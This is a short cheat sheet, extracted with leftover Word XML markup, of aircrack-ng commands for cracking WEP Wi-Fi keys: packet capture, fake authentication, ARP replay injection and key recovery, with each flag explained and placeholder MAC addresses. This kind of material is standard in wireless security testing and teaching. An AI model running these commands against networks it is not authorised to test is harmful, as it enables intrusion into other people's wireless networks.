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Cracking commands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airodump-ng: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“airodump-ng --bssid 00:00:00:00:00:00 --channel 1 --write test wlan0” - monitor wifi network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--bssid</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">- mac address of a router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--channel </w:t>
        <w:tab/>
        <w:t xml:space="preserve">- working channel of a router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--write </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">- name of a log file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wlan0</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">- wifi adapter in monitor mode id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aireplay-ng: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“aireplay-ng --fakeauth 0 -a 00:00:00:00:00:00 -h 00:00:00:00:00:00 wlan0” - associates adapter with wifi network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“aireplay-ng --arpreplay -b 00:00:00:00:00:00 -h 00:00:00:00:00:00 wlan0” - catches an ARP file and continuously sends it to the target network (generates packets with new IVs)</w:t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--fakeauth </w:t>
        <w:tab/>
        <w:t xml:space="preserve">- type of an attack (fake authentication, number specifies number of tries)</w:t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--arpreplay</w:t>
        <w:tab/>
        <w:t xml:space="preserve">- type of an attack (arp resend)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 </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">- access point mac address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 </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">- target network mac address</w:t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 </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">- wifi adapter mac address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wlan0</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">- wifi adapter in monitor mode id</w:t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Notice: </w:t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You can get a wifi adapter mac address using iwconfig (first 6 parts of unspec).</w:t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aircrack-ng:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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“aircrack-ng test.cap” - investigates .cap file for WEP key</w:t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test.cap </w:t>
        <w:tab/>
        <w:t xml:space="preserve">- file produced by airodump while monitoring wifi network</w:t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Notice: </w:t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It's better to use the numeric value of a key without ‘:’ (11:22:33:44:55 -&gt; 1122334455).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